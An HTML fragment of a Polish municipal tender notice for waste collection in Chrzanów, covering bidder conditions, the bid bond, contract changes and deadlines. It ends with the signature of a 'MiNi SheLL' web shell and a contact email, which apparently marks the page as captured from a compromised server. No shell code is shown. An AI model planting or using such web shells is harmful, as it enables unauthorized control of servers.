class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.1.Zdolności do występowania w obrocie krajowym - Zamawiający nie stawia w ww. zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny,<br/>2.2.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że posiadają uprawnienia do określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/> a. Wykonawca spełni ten warunek , jeśli wykaże, że jest wpisany do rejestru działalności <br/>regulowanej dla Gminy Chrzanów w zakresie odbierania odpadów komunalnych od <br/>właścicieli nieruchomości o którym mowa w przepisie art. 9b ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach.<br/>b. Wykonawca spełni ten warunek jeżeli wykaże, ze posiada aktualny wpis do rejestru pod-miotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (rejestr BDO), zgodnie z wymogami ustawy z dnia 14 grudnia 2012 r. o odpadach (dz. U. 2022 poz. 699).<br/>2.3. Warunek ekonomiczny – <br/>Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości :<br/>Dla Zadania I- nie mniejszej niż 200 000,00 zł (słownie: dwieście tysięcy złotych).<br/>Dla Zadania II i III- nie mniejszej niż 100 00,00 zł (słownie: sto tysięcy złotych).<br/>2.4.Warunek zdolności technicznej lub zawodowej. <br/>Zadanie I:<br/>Wykonawca spełni warunek, jeśli wykaże ,że dysponuje samochodem - śmieciarką umożli-wiającą odbiór odpadów z pojemników na odpady mieszane o poj. 5 m3 , samochodem –śmieciarką szczelnej konstrukcji uniemożliwiającej wycieki dla bioodpadów w przypadku <br/>pojemników o poj. 1,1 m3 oraz samochodem – śmieciarką umożliwiającą odbiór selektywnie zbieranych odpadów komunalnych w pojemnikach o poj. 240 l.<br/>Zadanie II:<br/>Wykonawca spełni warunek, jeśli wykaże ,że dysponuje samochodem- śmieciarką umożli-wiającą odbiór odpadów z pojemników 0,24 m3 i 0,12 m3, samochodem – śmieciarką szczel-nej konstrukcji uniemożliwiającej wycieki dla bioodpadów w przypadku pojemników o poj. 0,12 m3 oraz samochodem – śmieciarką umożliwiającą odbiór selektywnie zbieranych od-padów komunalnych (worki).<br/>Zadanie III:<br/>Wykonawca spełni warunek, jeśli wykaże ,że dysponuje samochodem - śmieciarką umożli-wiającą odbiór odpadów z pojemników na odpady mieszane oraz selektywne o poj.1,1 m3 , samochodem –śmieciarką szczelnej konstrukcji uniemożliwiającej wycieki dla bioodpadów w przypadku pojemników o poj. 240 l oraz samochodem – śmieciarką umożliwiającą odbiór selektywnie zbieranych odpadów komunalnych w pojemnikach o poj. 120 l. i 240 l. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> XVII.	Wymagania dotyczące wadium.<br/>1.Wykonawca przystępujący do postępowania jest zobowiązany, najpóźniej dzień przed upływem terminu składania ofert, wnieść wadium w kwocie:<br/>Dla Zadania I: 2400,00 zł brutto (słownie: dwa tysiące czterysta złotych 00/100)<br/>Dla zadania II: brak wadium<br/>Dla zadania III: 400,00 zł brutto (słownie: czterysta złotych 00/100)<br/>2.Wadium musi obejmować pełen okres związania ofertą, tj. do dnia 6.01.2024 r.<br/> 3.Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust.7 ustawy Pzp.<br/>4.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku BS , numer rachunku 23 84440008 0000 0081 5819 0005. Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego). W opisie przelewu należy wpisać nazwę postępowania którego dotyczy wadium wraz z nr referencyjnym.<br/>5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>6.W przypadku , gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art.98 ust 2 pkt 3 ustawy o Pzp, zamawiający odrzuci ofertę na podstawie art.226 ust.1 pkt 14 ustawy o Pzp.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art.98 ust.1-5 ustawy o Pzp.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art.98 ust.6 ustawy o Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> .Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 4a, 4b i 4c do SWZ. Umowa zostaje zawarta na podstawie złożonej oferty Wykonawcy.<br/>2.Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało wysłane w inny sposób.<br/>3. Zamawijący może zawrzeć umowę w sprawie zamówienia publicznego przed upływam terminu o którym mowa w pkt 1., jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko 1 ofertę.<br/>4. Zamawiającemu przysługuje prawo odstąpienia od umowy, gdy wystąpi istotna zmiana okoliczności powodująca, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.<br/>Umowa zostaje zawarta na podstawie złożonej oferty Wykonawcy.<br/>5. Zamawiającemu przysługuje prawo odstąpienia od umowy:<br/>a)gdy wystąpi istotna zmiana okoliczności powodująca, że wykonanie umowy nie le-ży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.<br/>b) dokonano zmiany umowy z naruszeniem art. 454 i art. 455,<br/>c) wykonawca w chwili zawarcia umowy podlegał wykluczeniu na podstawie art. 108.<br/>6.Zmiany umowy mogą dotyczyć również zmiany kluczowego personelu wykonawcy lub zamawiającego oraz podwykonawców w przypadku zaistnienia okoliczności uzasadniających zmianę (np. stan zdrowia, rezygnacja z pracy, likwidacja firmy podwykonawcy).Jeżeli zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoły-wał się, na zasadach określonych w art. 118 Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>7.Rozwiązanie Umowy następuje z zachowaniem 30 dniowego okresu wypowiedzenia.<br/><br/>Postanowienia , które zostaną wprowadzone dla Zadania nr I:<br/>1.W zależności od potrzeb, Zamawiający przewiduje możliwość́ skorzystania z prawa opcji (zamówienia opcjonalnego), o którym mowa w art. 31 ust. 1 i 441 ust. 1 Ustawy Pzp. <br/>2. Skorzystanie z prawa opcji będzie polegało na zwiększeniu ilości odbioru odpadów z Cmentarza Komunalnego w Chrzanowie w ramach zawartej Umowy, maksymalnie do 10 % całkowitego wynagrodzenia Wykonawcy określonego w § 4 ust. 3 Umowy i uruchomionego przez Zamawiającego na podstawie jednostronnego oświadczenia - zamówienia w formie pisemnej. <br/>3. Podstawę̨ określenia wartości wynagrodzenia Wykonawcy w ramach prawa opcji stanowić́ będą̨ ceny jednostkowe wskazane w ofercie Wykonawcy.<br/>Postanowienia , które zostaną wprowadzone dla Zadania nr III:<br/>1.W zależności od potrzeb, Zamawiający przewiduje możliwość́ skorzystania z prawa opcji (zamówienia opcjonalnego), o którym mowa w art. 31 ust. 1 i 441 ust. 1 Ustawy Pzp. <br/>2. Skorzystanie z prawa opcji będzie polegało na zwiększeniu ilości odbioru odpadów z Placu targowego przy ul. Kusocińskiego w Chrzanowie w ramach zawartej Umowy, maksymalnie do 10 % całkowitego wynagrodzenia Wykonawcy określonego w § 4 ust. 3 Umowy i uruchomionego przez Zamawiającego na podstawie jednostronnego oświadczenia - zamówienia w formie pisemnej. <br/>3. Podstawę̨ określenia wartości wynagrodzenia Wykonawcy w ramach prawa opcji stanowić́ będą̨ ceny jednostkowe wskazane w ofercie Wykonawcy. <br/>Zamawiający dopuszcza również możliwość waloryzacji wynagrodzenia w przypadku wystąpienia zmiany poziomu ceny materiałów lub kosztów związanych z realizacją zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Portal e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa zadania:: „Odbiór odpadów stałych pochodzących z Cmentarza Komunalnego w Chrzanowie, budynku przy ul. Garncarskiej 4 w Chrzanowie i budynku przy ul. Szymanowskiego 47A w Pogorzycach oraz z targowiska przy ul. Kusocińskiego w Chrzanowie”.

Creat By MiNi SheLL
Email: jattceo@gmail.com